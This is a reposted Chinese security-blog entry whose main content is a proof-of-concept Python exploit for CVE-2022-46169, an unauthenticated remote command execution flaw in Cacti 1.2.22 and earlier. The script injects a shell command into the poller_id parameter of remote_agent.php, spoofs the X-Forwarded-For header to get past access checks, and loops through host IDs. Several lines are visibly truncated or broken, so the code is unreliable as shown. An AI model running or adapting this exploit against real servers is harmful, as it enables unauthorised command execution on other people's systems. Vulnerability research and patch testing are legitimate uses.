CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE

渗透技巧 2个月前 admin
243 0 0
positional arguments:
  target                URL of the Cacti application.

optional arguments:
  -f FILE               File containing the command
  -c CMD                Command
  --n_host_ids          The range of host_ids to try (0 - n)
  --n_local_data_ids    The range of local_data_ids to try (0 - n)

import requests
import argparse

parser = argparse.ArgumentParser(
    prog='Poc for CVE-2022-46169',
    description='Exploit Unauthenticated RCE on Cacti <= 1.2.22',
    epilog='Author: saspect')

parser.add_argument('target', help='URL of the Cacti application.')

group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', type=argparse.FileType(),
                   help='File containing the command', dest='file')
group.add_argument('-c', help='Command', dest='cmd')

    '--n_host_ids', help='The range of host_ids to try (0 - n)', default=100, dest='n_ids', type=int)

    '--n_local_data_ids', help='The range of local_data_ids to try (0 - n)', default=50, dest='n_localids', type=int)

args = parser.parse_args()

if args.file:
    # The '-f' argument is supplied, read the command from the file
    cmd =
elif args.cmd:
    # The '-c' argument is supplied, use it as the command
    cmd = args.cmd
    # No command was supplied, print an error message

payload = f'; /bin/sh -c "{cmd}"'

local_data_ids = [x for x in range(0, args.n_localids)]
target_ip ="/")[2]

print(f"[*] Trying for 1 - {args.n_ids} host ids")

for id in range(args.n_ids):
    url = f'{}/remote_agent.php'
    params = {'action': 'polldata', 'host_id': id,
              'poller_id': payload, 'local_data_ids[]': local_data_ids}
    headers = {'X-Forwarded-For': target_ip}

    r = requests.get(url, params=params, headers=headers)
    if('cmd.php' in r.text):
        print(f"[+] Exploit Completed for host_id = {id}")


CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE


原文始发于微信公众号(Khan安全攻防实验室):CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE

版权声明:admin 发表于 2023年2月3日 上午8:33。
转载请注明:CVE-2022-46169 的 PoC - Cacti <= 1.2.22 上未经身份验证的 RCE | CTF导航